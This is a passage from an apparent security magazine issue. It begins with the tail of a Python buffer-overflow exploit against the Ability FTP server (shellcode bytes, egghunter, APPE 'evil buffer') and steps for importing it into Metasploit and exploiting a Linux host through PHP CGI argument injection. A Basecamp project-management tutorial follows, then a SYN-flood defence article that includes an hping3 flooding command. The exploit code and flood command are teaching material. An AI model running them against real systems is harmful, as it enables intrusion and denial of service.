„\x96\xa2\x74\x98\x61\xc4\xaf\x5c\xfd\x3b\x4f\x9d\xd7” „\xff\x1b\xcd\x4f\x29\x23\x86\x8f\xd6\xf6\x09\xc0\x78” „\xa8\xe9\xb0\x38\x18\x82\xda\xb6\x47\xb2\xe4\x1c\xfe” „\xf4\x2a\x44\x53\x93\x4e\x7a\x74\x67\xc6\x9c\x10\x77” „\x8e\x37\x8c\xb5\xf5\x8f\x2b\xc5\xdf\xa3\xe4\x51\x57” „\xaa\x32\x5d\x68\xf8\x11\xf2\xc0\x6b\xe1\x18\xd5\x8a” „\xf6\x34\x7d\xc4\xcf\xdf\xf7\xb8\x82\x7e\x07\x91\x74” „\xe2\x9a\x7e\x84\x6d\x87\x28\xd3\x3a\x79\x21\xb1\xd6” „\x20\x9b\xa7\x2a\xb4\xe4\x63\xf1\x05\xea\x6a\x74\x31” „\xc8\x7c\x40\xba\x54\x28\x1c\xed\x02\x86\xda\x47\xe5” „\x70\xb5\x34\xaf\x14\x40\x77\x70\x62\x4d\x52\x06\x8a” „\xfc\x0b\x5f\xb5\x31\xdc\x57\xce\x2f\x7c\x97\x05\xf4” „\x8c\xd2\x07\x5d\x05\xbb\xd2\xdf\x48\x3c\x09\x23\x75” „\xbf\xbb\xdc\x82\xdf\xce\xd9\xcf\x67\x23\x90\x40\x02” „\x43\x07\x60\x07” #arranging stack 40 NeXpose and Metasploit Pro Hacking myStage1 = junk1 + egg_hunter myStage1 += retaddress + „\xEB\xC4” myStage2 = „w00tw00t” + nops + buf s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((‚192.168.81.140’,21)) # hardcoded IP address of Ability Server running s.recv(1024) s.send(‚USER ftp’ + ‚\r\n’) # login with ftp as user s.recv(1024) s.send(‚PASS ftp’ +’\r\n’) # authenticate with ftp as password s.recv(1024) s.send(‚APPE’ + myStage1 + myStage2 + ‚\r\n’) # evil buffer s.recv(1024) s.send(‚QUIT\r\n’) s.close() Now, to import this as a module in the Metasploit, we will first fuzz the Ability server with our Python fuzzer and then use Immunity Debugger to generate Metasploit Exploit code, which we will customize for our use. Fuzzing steps are shown sequentially in below snapshots in which FTP server was used to fuzz and then “mona.py” was used to generate the Metasploit Code for us. 41 NeXpose and Metasploit Pro Hacking 42 NeXpose and Metasploit Pro Hacking You can find the exploit module in the Immunity Directory and the initial code would be like shown below. The code would look like this: 43 NeXpose and Metasploit Pro Hacking You should now customize the details that you feel are mandatory as per the vulnerability discovery, however, you can customize the information section of this module and then import this into the Metasploit Framework by copying this module in the following directory as shown below. However, name the module so you can easily find it in the search; in this case, we will name it “ralab_ability.rb”. Before you add this module into Metasploit Framework, note down the exploits count as shown in the below snapshot; total exploits in Metasploit available are 1409. Copy the module you have just created into the following directory as shown in below snapshot. 44 NeXpose and Metasploit Pro Hacking Now run the command on Metasploit console “reload_all”; this will reload all modules and you should check the exploit number. You should see the number and it should be one more than the previous total number of exploits; in our case, it incremented to 1410 as shown below. 45 NeXpose and Metasploit Pro Hacking Now, search for your exploit in the Metasploit Framework, you should search with “ralab” and should be able to see the exploit available as shown below: Use this exploit to hack into the Windows machine running Ability server, however, you need to customize the exploit and add mandatory requirements, like “register” function requirements for adding login/password option for exploit and setting up buffer space. However, you can use the already customized exploit available in Metasploit Framework to hack into Windows machine. Hacking Linux Machine In Metasploit Framework, we looked for the “PHP CGI Argument Injection Vulnerability” as shown below. 46 NeXpose and Metasploit Pro Hacking We set the target to our Linux Machine on 192.168.81.138 and exploited this bug. And very easily we got the Meterpreter session. We hope this has been informative for you and we would like to thank you for completing this workshop. About the Author Raheel Ahmad, CISSP, CEH, CEI, MCP, MCT, CRISC, CobIT Founder of 26Securelabs an Information Security consulting company. Raheel is an expert in information security with 9+ years in the domain of infosec. 47 May 31 - June 3, 2015 Marriott Resort at Grande Dunes Myrtle Beach, SC USA The international meeting place for IT security professionals in the USA Since 1998 Register Now at www.TechnoSecurity.us with promo code HAK15 for a 20% discount on conference rates! Comexposium IT & Digital Security and Mobility Trade Shows & Events: an event by NeXpose and Metasploit Pro Hacking Basecamp – Project Management for the Sane by Troy Hipolito Download the latest ISO Interactive white paper. There you will find a company description, capabilities, visuals, development process, case insights, and technology definitions. • ISO White Paper: www.isointeractive.com/pdf • ISO Video: www.isointeractive.com/#showreel • ISO Website: www.isointeractive.com 49 NeXpose and Metasploit Pro Hacking ISO Interactive are award winning consultants that build engaging mobile and web experiences. Known for small to large opportunities using Unity, Flash, HTML5 and traditional web programming, they have built very cool virtual worlds, 3D simulations, mobile apps, social games and web designs. 50 NeXpose and Metasploit Pro Hacking Overview In this tutorial, we will dive into a basic understanding of Basecamp (a project management tool we use), as well as learn how to get up to speed quickly so that you can start realizing the benefits of the program, among which are centralizing communications, reducing the frequency of meetings, facilitating team coordination on projects, and providing transparency on timelines. We do have more detailed information concerning the project management role and methods that work best for your orginization in my previous article located at: http://sdjournal.org/download/2011-pentestextra-issues/. Feel free to check it out as there is good information on project management organization and methods. Speaking of... Project management is one area we have a lot of experience in. We believe project management is a major factor in determining success of the project. This is especially true for complex and technical endeavors. Now I am not taking away from the great designers and developers, but having these is more of a norm. Great designers and developers need unification and sometimes direction to keep goals, budgets and timelines reasonable. Our groups have worked in corporate as well as the agency scenarios. To be honest, we favor an agency style as it has more of a startup feel and allows us to get our hands dirty. This allows some control to drive tasks and better target success. 51 NeXpose and Metasploit Pro Hacking Corporate project management is our view more in reporting to a number of bosses than actual management. It’s different due to the structure and size of the client/partner. The good people at 37signals have revamped their popular project management software Basecamp. Previously we produced a popular project management article for the Software Developer’s Journal that touches on the old version of the software. More specifically, it is the cover article for the Flash & Flex magazine in 2011. So we have actually touched on some of that information but now we will concentrate on an in-depth tutorial of the new version of Basecamp. This tutorial is divided into several sections, starting with the basic Why Basecamp?, followed by a description of the various features and capabilities of Basecamp. The third section will cover usage instructions and guidelines, from identifying project scope to replying to Basecamp Messages. The final section covers the conclusion. Why Basecamp? You may be wondering, why do we use Basecamp versus another tool? Well we actually do use other tools depending on the client/partner/requirements. There are many great online tools out there, for example Jira, MS Project, Asana and RallyDev. Some of these are more feature rich with true Agile processes while others have very specific set of functions. At ISO the main focus is to produce a high quality product with the least amount of drama. That may not sound completely intuitive, but if you think about it, everything is about making things flow and reducing drama. Controlling costs is actually a byproduct. The best designers and developers are sometimes a pain in the butt (not all, but most). You know what I’m talking about: acting like they just hit puberty, not making their deadlines (that they committed to), getting their feelings hurt easily, whining, crying and all that nonsense. And they have to be managed without them pooping their pants and walking out of the job because they aren’t doing what they said or aren’t getting their way. My goodness, it is pain to manage but absolutely needed. While generally we “try” to adopt more agile processes, we are bound by the rapid changing needs of the business, which can grow in volume at a rapid pace. Our focus is directed by numerous initiatives that result in a compound of projects with a pairing of unique groups. Planning projects around Agile-style “sprints” (i.e., a guaranteed amount of time) is not always possible and more often not probable. 52 NeXpose and Metasploit Pro Hacking Basecamp is often more suitable for many of our needs because it is task-oriented and date-driven. Another great benefit of Basecamp is it’s an entirely online secure desktop tool. Basecamp also offers a mobile app. Additional highlights the program offers: • Centralizing communication for emails based on the project, conversation thread and assigned tasks. • Uploading and tagging files associated with a particular project. Typically, these are items like word documents, spreadsheets, images, PSDs and PDFs. • Setting up and tracking schedules for development, meetings, and handoffs. The key to success when using Basecamp is for everyone to actually use it for the tasks at hand. Otherwise, there will not be record of any tasks being worked on. This can easily degenerate into halting progression to the next step of the project, delays in securing approvals and handing off to other departments, and failure to meet deadlines. In short, not properly communicating within Basecamp and your project tasks can jeopardize launch dates. So think of Basecamp as a handy organization tool that allows the your team to be more efficient and enhance productivity. On to our review of Basecamp! The following are the six (6) main sections found under the Projects Menu in Basecamp: • Projects • Calendar • Everything • Progress • Everyone • Me Projects Menu When you log in to Basecamp, you are directed to the main page, where you are able to see all of the projects available. From here you can select the project you want, change the view of how you want to see projects, “star” projects that pertain to you, and even create new projects via a template or from scratch. On this page there is also a little search box that allows you to find things quickly. 53 NeXpose and Metasploit Pro Hacking There are a number of projects in the queue at any given time. To find a particular project simply, scroll up or down until find what you need. You’ll also have the option to change the view from “graphical” to “hybrid” to “textual” by using the icons on the left of the screen (below the New Project link). If you like to read through the list quickly you may want to use the “textual” view. If you want to group the projects which are specifically assigned to you, simply click on the “star” for those projects and they will all be moved up together to the top. Additionally, if you want to look for a project that you know is finished but can’t find the name, click the archived projects link on the top right to see a listing of those projects. Individual Project “Project Name” Each project has a number of components. Clicking on a project, you will notice menu links/sub sections for Project Landing Page, Discussions, To-dos, Files, Text Documents and Events. Project Landing Page The title of the project is the link to the project landing page. These pages are useful for viewing recent activity on the other subsections. From top to bottom it has the Latest project updates, Discussions, To-do lists, a visual of the Files uploaded and newest Text Documents. All content from these subsections displayed on the project landing page link directly to those details. Next, let’s take a look at the definition of most of these titles. 54 NeXpose and Metasploit Pro Hacking Discussions Discussions serves as a type of “centralized” email inbox. Typically Discussions are not directly tied to to-dos. These are used for emails which may deal with internal approvals and general notes that may or may not pertain to current tasks. Each discussion can have its own thread. For example, “discussions” can be used to post project notes. Starting a Discussion To start a discussion, log in to your Basecamp project, click on the post a new message button. There you have the Subject line and the message area. You can format with the tools available and if needed upload a file. Make sure you DO NOT email everyone. No one likes spam. Please only click on the individuals that need to know. There is more on this and other etiquette items in the How We Use Basecamp section. 55 NeXpose and Metasploit Pro Hacking Once they receive a Basecamp message, individuals can simply email back from their native email client or click the “view on Basecamp” link within the email to reply. Viewing from Basecamp will allow the entire conversation thread to be reviewed. Lastly, you can attach files as needed in discussions. To-do lists To-dos are a vital part of Basecamp. It is what generates the Calendar and assigns tasks to individuals and denotes important events. It is basically an adjustable task list with due dates. Within the following image there is an Add a to-do list button, title of a current To-do list and individual to-dos/tasks. And on the right side there are the view options (show assigned to, show when is due, show completed, and individual to-do lists). Basecamp allows for numerous lists. Typically, depending on the type and size of the project, you may want to break it up. At this time, however, our projects are fairly small, so we would we prefer a more linear approach. It is simpler for our current needs. 56 NeXpose and Metasploit Pro Hacking The previous image displays individual to-dos that can have a few pieces of additional information. Normally it has a description, due date and the person the task is assigned to. If there are any comments relating to this to-do task, you will see a note following the to-do task description. Once the to-do task is completed, the assigned person or Project Manager can check it off (with the check button). In order to view a comment, just click on it. Comments are very good if the short description does not have enough detail. However, for our projects we add some additional info. In each of our to-do items we have the subject (e.g Comps), short description, percentage complete, date or date range, separate due date and person the task is assigned to. In the example below, the original description was reduced to UX > set 1. In this case, we added comments for further clarification. Selecting on a to-do task (that has comments) will display all the comments in a thread fashion. This is very similar to how the message conversations are done. The viewer will also be able to select to whom to email the message. The purpose is to have the person assigned to be responsive regarding the progress of their task and to centralize related conversations. Only conversations that pertain to this to-do task should be added here. There is also an option to email people outside of Basecamp who are not part of the project. However, that is not recommended for our production flow. Once individuals receive a message, they can simply reply via their email client or from Basecamp. It is usually better to email back via Basecamp if you feel that you want to read part or the entire thread. 57 NeXpose and Metasploit Pro Hacking Going back to the additional info we added, let’s talk about the percentage item (e.g. [30%]). This info can be added manually in Basecamp by the person performing the task, as well as the project manager. This is done by moving your cursor over the to-do task and then selecting the “edit” option. This allows everyone to quickly see how much of the task is considered completed. Formatting it this way also has some major advantages. That piece of information, along with the due date, is pulled in a visual Gantt chart/timeline called TeamGantt.. Gantt Chart This is separate online software that is very useful for visual teams. And the project manager can invite the same people on the project from Basecamp to TeamGantt. 58 NeXpose and Metasploit Pro Hacking TeamGantt uses the percentage info provided to show completion of the task. The beginning and end dates in the to-do task description are just a reference so we can visually adjust the timeline. But adding the time range in the textual format makes it is easy to read and that is the important thing. TeamGantt also has some neat printing features, associating tasks with each other and even color coding groups of tasks. As such, if designing comps are dependent on wireframes, you can link them together visually. In this case, I have made all the comp related items a fuchsia, or “hot pink” color. So all the comp driven tasks are one color, UX-related another color, and so on. A couple of other neat features allow the Project Managers or individuals with edit permissions to send notes to the tasks from both Basecamp and TeamGantt. It is just a little option that helps get things done quickly. 59 NeXpose and Metasploit Pro Hacking Calendar For the most part the Calendar is pretty self-explanatory. There are some automatic things it provides, as well as features that can be used. Below is a screenshot. To the left of the screenshot, the Calendar shows all the events relating to the projects you are involved with. Be aware that the complete view is on by default, and it may become too much information unless you turn off projects you are not focusing on. If that is the case, just click the little colored circle with the check mark in order to turn the visibility (on or off) of the related tasks from the calendar. What you see in the larger portion of the calendar are all the to-dos posted by due dates. A user can also use this to checkoff work. Besides the normal To-do items, individuals can also add their own entries and associate them to any accessible project. These, however, do not create a to-do item but, rather, only create a calendar event. Our group uses Google Calendar, so we may not use this as often. However it may be useful to add events if it helps to keep track of events on an individual bases. The following image shows how to create an event. You can add an event by clicking on any of the calendar days. You can add the event’s title and additional notes to the desired calendar, and you can even adjust the event to span over multiple days if needed and then email your colleagues. 60 NeXpose and Metasploit Pro Hacking Everything “Everything” is an easy way to browse all items in their respective groups. This section has Browse every discussion, Review all open to-dos, See every single file, Read all text documents, Show all forwarded emails and See all deleted items. These are just other ways to find information quickly. 61 NeXpose and Metasploit Pro Hacking To provide a quick breakdown: • Browse every discussion > Provides a listing of any/all textual updates in the order they were added. You can click to get to that discussion and associated project by selecting it. • Review all open to-dos > Provides access to all the to-dos (that you have access to) that have not been checked off. Again, you can just link to the exact to-do within the project by clicking on any of the items on the page. 62 NeXpose and Metasploit Pro Hacking • See every single file > Provides access to all uploaded files for all the projects to which you have access to. Useful if you have a lot of projects and you want to have an overview of all uploaded files, etc. • Read all text documents > Shows all documents based on the last update. • Show all forwarded emails > For emails that have responses from outside of Basecamp. We probably will not have a need for this. • See all deleted items > Anything that has been deleted. This is also not used very often. Progress Shows who did what in the order it happened. This comes in very handy when wanting to find out any activity of the last few days. Beyond that it may present too much info. The Progress section also gives a good indication on who is using Basecamp and how. You can scroll down, review the messages, files and happenings in real time. Everyone This section shows everyone based on the last active individuals. Latest active individuals are posted first. You can see everyone by clicking the “See all people” link on the bottom left of the screen. Incidentally, “admins” can add additional people, change access permissions and perform other administrative functions. 63 NeXpose and Metasploit Pro Hacking Me The “Me” section can be very helpful to quickly see everything on your plate. Provides access to all the latest activity across all your projects, all your open to-dos, recently completed todos and files you have shared. This should actually be the first place you should go in the morning to see if it lines up with what you know needs to happen. 64 NeXpose and Metasploit Pro Hacking How We Use Basecamp (Usage Guidelines) This is so important we made it a major section in the article. Proper etiquette comes into play when we think of how our actions affect the team and timelines. Basecamp is pretty much an open system. We can use it the way we like. We as a group need to form and follow a sort of protocol or “etiquette” which will be helpful in making everything to start making sense and become more of a natural process. This process should include “when” and “how” we use Basecamp communications, as well as where information should be located. Basecamp is not a perfect tool by far. It is up to everyone to use and tweak it as needed. At the same time, if we do not report to it, then the information will not be available for everyone else. An added advantage of properly and effectively using the system is that it will actually help reduce the need for some of the meetings and allow you to complete your work. The rules of today maybe switched later for something that makes more sense. But for now these are the general usage guidelines. Identifying Your Tasks Tasks can be anything including replying to messages, reviewing documents, identifying dates and, yes, especially to-dos. One of the things we have to keep in mind is to look out for each other. If you notice that there are tasks missing that will prevent you from doing your work (or dates that do not seem appropriate) then please let everyone else know. It probably has to be addressed. 65 NeXpose and Metasploit Pro Hacking So, where do we start? • First go to the “Me” menu link. There you can see what tasks are assigned to you. This does not give you a clear priority but it does show you all things you are associated with. If you know there are tasks or projects that you have to do work on and it is not there, find out why. If it is not on Basecamp then others may not know it exists. Basecamp should be used as transparently as possible so others can quickly see how the project is going without the need for much interaction. Basecamp is designed to show you and others where you are at in the process of your projects. • Secondly (and this is optional): START POINT project is a good place to go to, as there is a to-do list called Priorities. There you can find your name and make notes on your goals for the day in order of importance. Creating this priority list helps you focus on items needed. And we all know the focus can change at any moment. So feel free to update that to-do item for any updates. • Once you are focused for the day, it is best to dive in the individual project you are working on. Based on the priority list you have created, then go the project you have to work on. Identifying project scope and important files and links Even after you have reviewed the project and your to-do’s, do not overlook the possibility that there are times when there may be context missing on the project or you may need access to some particular bit of additional information. This could be a reference info, a “what the heck is this project about,” a list of who is on it, or information on how to get access to the needed file(s). It may just be that you need more details on the actual to-do/task... Formatting explanation of the to-dos schedule To make the to-dos a little more precise and at the same time keep the amount of content readable for the todos, we have implemented a subject formatting technique to assist in this matter. As we mentioned before, the to-dos are tasks that can be also arranged as a schedule (view section 1.3 for general details on to-do’s). This subsection, however, is really designed to break down why we format it the way we do. Please note that not all to-do items may be formatted this way. However, if you have a series of tasks that form a schedule, then it is best to use these practices. To simplify the different styles let’s call these series of tasks (to-do schedules) and non-series of tasks (one-offs or similar tasks). To illustrate the point the images that follow are 2 different views of the same series of tasks. The first image is what you see from Basecamp, while the second is a more visual timeline generated in TeamGantt. Series of tasks Basecamp view. Most projects that require a series of tasks are broken up in usable chunks. They tend to include most of the larger events, but often meetings spring up for additional reviews or issues that are not related to the project. You can see this project is a little more complicated than most, but the basic structure is pretty standard. Typically, most projects have: • BO (Business Owner) ZIP and CB (Creative Brief). In the example below it was already completed and checked off. • Internal kick-off. Again, this already happened and has been checked off. 66 NeXpose and Metasploit Pro Hacking • UX development • Content support • Comps • Internal reviews (some times these are not listed as the dates shift too often) • Legal reviews • IT Release • UAT prep • IT Dev • UAT internal testing • Launch As you will notice, the following image has multiple releases. Sometimes this is needed if you are dividing design and development/IT groups. Dev/IT may have to get started on a project overlapping the design schedule in order to make launch dates. 67 NeXpose and Metasploit Pro Hacking Now that we have an idea of the different groupings, let’s consider formatting. If you take another look at the series of tasks shown above, you will notice that some have “++” in front of them and others do not. • The “++” prefix generally represents a release or major meeting. These are what we call non-tasks or things that do not require the online group to develop. Items without the “++” prefix generally represent design of UX, content creation or comp designing. • You will also notice that we use the overarching subject first. So you may read things like UX, Content or Comps. Then you will notice a little arrow like this “>”. After that a small amount of detail (just enough to understand what is being worked on). • After the detail you will often see a date or date range. For events that take one day, a simple date is needed, while for events spanning a period of time it is good to just put the date in the description. This is important because Basecamp only tracks end dates. We want to show the start and end dates. • After the date or date range you may see a percentage in brackets like this – [50%]. This is manually filled out so we get an idea on where this task is in the process. It is also auto-translated visually in the Gantt chart in TeamGantt. And if the description is a bit vague, that is why you add a comment to it. That way anyone looking at this particular to-do can see that there is a comment which can be clicked on to drill down and see additional details. • Then the task is assigned to someone and given a due date. You may be curious why there is a date range and a due date. For starters, while due dates are tracked in the system, we format these dates visually to make it easier to read and identify start dates. Also TeamGantt has start dates as well as end dates. It is easier to adjust the start in TeamGantt once you can actually read the date ranges in the description. So let’s use this example and break it down. Comps > set 1 > see comments > 8/12 – 8/15 [0%] 1 comment Person Name Mon Aug 11 • Comps = Overall subject. • set 1 = Short detail. • see comments • 8/12 – 8/15 • [0%] • 1 comment • Person Name Mon Aug 11 = A note signifying that more details on the tasks are to found in the comments. = Start and end date (note we will probably have several internal approval meetings in between these dates that may or may not be notated on the schedule). = The estimated percentage of the task completion. = Shows how many comments are associated with this task. = Who is assigned (and defaults emails to), and when is that task due. 68 NeXpose and Metasploit Pro Hacking TeamGantt project is just pulling the Basecamp information, providing a visual reference of the time it takes to complete a task (start and end date), a visual percentage of completion, and some of the same tools that Basecamp has. To simplify, the Project Managers generally set up the permissions for TeamGantt to be “view only.” This is so individuals do not have to try to adjust things from there. But the Project Managers do have the ability to create messages and tasks from there if they choose (or need) to. The Project Managers also try to color-code 4 different types of tasks: Non-tasks (the ones with the “++” prefix): a default powder blue: • UX: light orange • Content: orange-red • Comps: a hot pink/fuchsia color. In the previous graphic you will notice that a few UX tasks are 95% done. The timeline items for that tasks is actually 95% full. This is a visual indicator of where the task is. Non series set of tasks The following image is example of a non series set of tasks. These are things like one-offs or recurring tasks. 69 NeXpose and Metasploit Pro Hacking The non-series of tasks are usually simple, yet explain things when possible in the subject first type of formatting. When to use regular email vs. Basecamp messages/to-dos There are lots of messages that do not have to be tracked or which don’t specifically pertain to a task. If this is the case, you don’t have to use Basecamp. You will have to decide if you want the message to be seen by others or not. We try to streamline whenever possible but also communicate enough to complete the tasks and “asks” at hand. These are some examples of what not to post on Basecamp. “Hi John – how was your weekend?”, “I did not like the meeting and thought it was a bad idea” or “I am concerned I committed to a deadline I can not reach.” These are examples of messages or personal conversations that should handled outside of Basecamp. Also if we are emailing other people outside of Basecamp, we should just use an email. They will not know what the email is if it coming from the Basecamp system. Replying to Basecamp messages/to-dos One obstacle we tend to run across is that we do not always have an understanding that a Basecampgenerated email is an email that requests a reply. If emails are not acknowledged then it can have an adverse effect when trying to finish projects in a timely manner. As such: 70 NeXpose and Metasploit Pro Hacking • Always direct the email to the main person when applicable. For example: If you are sending out a message and have selected several individuals to receive it, please direct the message to the individuals by adding @ symbol followed by the persons’ names. It will end up looking something like this: @Jon. That way once they receive the email the first thing they will see is who the email focused on. • Please reply to Basecamp emails. • Please start conversations on to-dos and messages on Basecamp (when appropriate). More information about general usage of Basecamp messages and to-dos please view sections 2.2 and 2.3. Conclusion Basecamp is a tool to allow us to centralize conversations, help build and maintain task-driven timelines. It can also be integrated with a number of other tools like TeamGantt, which allows us to visually see the timelines (beginning to end), percentage of items completed, certain print features and just allows the online group to quickly stay on track. Although Basecamp is a great tool to have, it only works well when people are consciously using it in a productive manner. This is a flexible system that requires a little manual work to keep things running smoothly. Just remember, you can also take a peek at the online help section where there are guides, videos and cheat sheets at: https://basecamp.com/help. I hope this article gives you the basics to help get projects done a little more efficiently and with more peace of mind. Having a sense of control and being able to confidently get things done and report positively to the client definitely makes your life easier. I like easy (Freudian slip). There are of course more advanced tools but we have chosen Basecamp and related online applications because they are flexible enough for the projects we are working with, while easy enough for clients to respond to. All things are centralized and documented automatically in one place. And if the client responds, then you have a direction you can move towards to make it closer to finishing the goals of the job. If anyone is interested in the work we have done please take a gander at our site http://www.isointeractive.com as we have at least some of our public projects posted there. Mostly we deal with helping clients and partners fixing or developing mobile apps, websites, software reviews/audits, games, 3D simulations, lots of specialty projects and good old web development. Typically they range from the range of 10k to under a million USD. A few links of interest: • ISO White Paper: www.isointeractive.com/pdf • ISO Video: www.isointeractive.com/#showreel • ISO Website: www.isointeractive.com Thank you and we look forward to continue contributing to the interactive community. If you have any needs or even just want to brainstorm, please feel free to connect. • email: [email protected] • skype: troyhipolito • web: isointeractive.com 71 NeXpose and Metasploit Pro Hacking • facebook: facebook.com/ISOinteractive • twitter: @isointeractive • instagram: iso_interactive About the Author Troy Hipolito is the Senior Consultant at ISO Interactive (a consulting social and mobile game company that supports agencies for campaigns, Facebook games, iPhone Apps and that sort of thing). 72 InterDrone is Three Awesome Conferences: For Builders More than 35 classes, tutorials and panels for hardware and embedded engineers, designers and software developers building commercial drones and the software that controls them. For Flyers and Buyers More than 35 tutorials and classes on drone operations, flying tips and tricks, range, navigation, payloads, stability, avoiding crashes, power, environmental considerations, which drone is for you, and more! Meet with 80+ exhibitors! Demos! Panels! Keynotes! The Zipline! For Business Owners, Entrepreneurs & Dealers Classes will focus on running a drone business, the latest FAA requirements and restrictions, supporting and educating drone buyers, marketing drone services, and where the next hot opportunities are likely to be! September 9-10-11, 2015 Rio, Las Vegas www.InterDrone.com A BZ Media Event NeXpose and Metasploit Pro Hacking Tackling SYN Flood attacks by Ratan Jyoti TCP SYN flooding attack is a type of Denial of Service attack where many bogus TCP SYN Packets are originated. During the normal three way handshake between client and server the client first sets off the connection with a TCP SYN packet, which is responded to with a SYN/ACK packet by the intended server and at last the client replies back with an ACK packet to establish the connection. Figure 1. A normal three way TCP Handshake In a TCP SYN flood attack, the malicious client begins a three way handshake which the client never finishes. The client only sends TCP SYN packets and no final ACK packets, and by virtue of which the server reserves memory slots for each incomplete connection. By this process, the server’s memory gets filled with increasing incomplete connections until the server can no longer no longer accept the other incoming requests (both genuine and malicious) in want of free memory. The goal of this simple technique is to deny the TCP services to the legitimate clients by creating a large number of half open TCP connections that fill the host’s listen queue. Usually, these TCP SYN packets use counterfeit IP addresses to prevent detection and because of these nonexistent IP addresses, no responses are returned to the server. Figure 2. TCP SYN Flood Attack 74 NeXpose and Metasploit Pro Hacking A sample SYN Flood induction in Linux by hping3 Hping3 is a tool developed by [email protected] which can send custom arbitrary TCP/IP packets to network hosts. Hping3 is a multipurpose tool which can be used to perform the following, among other things: • Testing firewall rules • Port scanning (basic and advanced) • Testing network performance • Trace routing • Remote OS fingerprinting • TCP/IP stacks auditingThis tool can be used to induce SYN Flooding. A sample SYN Flood attack input and output are demonstrated below: Input: $ sudo hping3 -i u2 -S -p XX -c N IP_Address HPING IP_Address (eth0 IP_Address): S set, 40 headers + 0 data bytes Output: --- IP_Address hping statistic --N packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms The above input command would send TCP SYN packets to IP_Address mentioned. Hping3 creates raw packet for which root privileges are used and hence sudo is required. Here S – indicates SYN flag p XX – denotes Target port XX i u2 – tells Wait for 2 micro second between each packet c – Indicates the number of packets to send/receive for sending N number of packets hping3 works in multiple modes which are: default mode TCP -0 --rawip RAW IP mode -1 --icmp ICMP mode -2 --udp UDP mode -8 --scan SCAN mode. How to determine if a particular server is under a SYN Flood attack Netstat in Linux is a simple tool by which it can be determined if the server is under a SYN Flood attack or not. Let us consider a server which can handle ten thousand user requests per second. 75 NeXpose and Metasploit Pro Hacking Table 1. SYN Flood Attack analysis Input netstat -nap | grep SYN | wc -l Output <1000 >1000 and <5000 >5000 Possible SYN Flood attack status SYN Flood attack less likely Possible SYN Flood attack SYN Flood attack Anything more than 2000 user requests per second is abnormal and denotes a possible SYN Flood situation. A user request of a few hundred per second depicts the normal situation. Ways to prevent/defend SYN Flood attack Filtering based on IP address Ingress IP filtering at the peripheral devices, such as the router, will decrease the chances of IP spoofing which can induce SYN Flood or similar attack. For example, the following ingress filter will be effective to tackle a SYN Flood attack: Listing 3. A simple logic for filtering IP addresses IF request source IP is within X.X.X.0/N THEN allow the request. IF THEN request source IP is anything else deny the request A careful IP range needs to be configured based on trust levels. Deployment of filter devices and their position in the network is the key. It may be difficult to stop. The drawback can be the malicious attacker who uses compromised legitimate IP addresses and changes these legitimate sources frequently. Such systems may be difficult to be tackled by this IP Filtering. Increasing Transmission Control Block Backlog queue Each connection is different and thus the TCP uses a special data structure called a Transmission Control Block (TCB) to maintain all the vital information about any connection. The devices maintain their own TCB for the connection individually. As soon as a connection starts, the respective TCB will hold all special information about it. Each connection can handle the memory based on TCB and its implementation. The TCP SYN-RECEIVED is a half open condition and the TCB is allocated as per the receipt of the SYN packet. In a SYN Flood scenario, the complete backlog of TCBs is used for SYN-received state and SYN-ACKs sent to the attacker’s designed fake endpoints and thus there remains no room for new TCBs to be put into new SYNRECEIVED, and because of which all incoming SYNs can not be treated. Increasing the backlog can tackle SYN Flood attack to some extent. However, increasing the backlog by too much can have a performance issue as will. 76 NeXpose and Metasploit Pro Hacking Listing 1. Increasing Backlog – net/core/request_sock.c …….. int sysctl_max_syn_backlog = 1024; EXPORT_SYMBOL(sysctl_max_syn_backlog); int reqsk_queue_alloc(struct request_sock_queue *queue, unsigned int nr_table_entries) { size_t lopt_size = sizeof(struct listen_sock); struct listen_sock *lopt; nr_table_entries = min_t(u32, nr_table_entries, sysctl_max_syn_backlog); nr_table_entries = max_t(u32, nr_table_entries, 8); nr_table_entries = roundup_pow_of_two(nr_table_entries + 1); lopt_size += nr_table_entries * sizeof(struct request_sock *); if (lopt_size > PAGE_SIZE) lopt = vzalloc(lopt_size); else lopt = kzalloc(lopt_size, GFP_KERNEL); if (lopt == NULL) return -ENOMEM; for (lopt->max_qlen_log = 3; (1 << lopt->max_qlen_log) < nr_table_entries; lopt->max_qlen_log++); Source: request_sock.c by Arnaldo Carvalho de Melo One SYN_RECV socket may cost approximately 80 bytes in a 32-bit system. The minimum value is 128 for low memory machines. Experiments with real servers show that it is very low as it would be difficult to manage even 100 requests per second. A minimum of 1024 is recommended. However, the actual number depends on expected number of requests per second. A high memory machine may handle more user requests per second. Decreasing SYN-RECEIVED state timeout Decreasing SYN-RECEIVED state timeout value will decrease the time a half-open connection will occupy the backlog queue, therefore the duration of SYN Flood will reduce. However, a value of timeout that is too small may abort even legitimate requests. In the case of a SYN Flood, the attacked server never recognizes the bogus requests. However, at the gateway level, these requests will be discarded and the SYN Flood situation can be tackled. In the new generation firewalls the semi-transparent gateway mechanism helps to tackle SYN Flood by artificially completing 3 way handshake and completing the 3 way handshake in a secure manner. For example, tcp_synack_retries settings in some Linux versions tells the kernel the number of times the SYN,ACK can be transmitted in response to SYN, which helps in dealing with the SYN Flood. 77 NeXpose and Metasploit Pro Hacking Listing 2. An ipv4 sysctl.conf ……. net.ipv4.tcp_fin_timeout = X net.ipv4.tcp_max_orphans = X net.ipv4.tcp_max_syn_backlog = X net.ipv4.tcp_max_syn_backlog = X net.ipv4.tcp_rmem = 4096 87380 X net.ipv4.tcp_sack = X net.ipv4.tcp_syn_retries = X net.ipv4.tcp_synack_retries = x net.ipv4.tcp_syncookies = X net.ipv4.tcp_timestamps = X net.ipv4.tcp_tw_recycle = X net.ipv4.tcp_wmem = X A careful setting of tcp_synack_retries may give the desired results in handling SYN Flood. SYN Cache implementation – replacing per socket linear chain of unfinished queued requests with a global hash table. The SYN Caching implementation typically helps by limiting the number of entries in the following manner: • By putting an upper limit on the memory that the SYN cache use • By putting an upper limit which a device requires for searching for a matching entry and replacing cache entries SYN Cache settings can be checked in the following manner and edited for optimum performance. Table 2. SYN Cache setting in /boot/loader.conf Input Output sysctl -a | grep syncache net.inet.tcp.syncache.rexmtlimit: X net.inet.tcp.syncache.hashsize: X net.inet.tcp.syncache.count: X net.inet.tcp.syncache.cachelimit: X net.inet.tcp.syncache.bucketlimit: X This implementation is special due to the usage of secret bits which prevents an attacker from targeting hash values in order to breach the bucket limit, and it relates to CPU time and memory. The bucket limit is set for each hash value; upon reaching the limit, the oldest entry is released. SYN Cookies SYN Cookies are a stateless SYN proxy mechanism. This is so because this assigns no state to 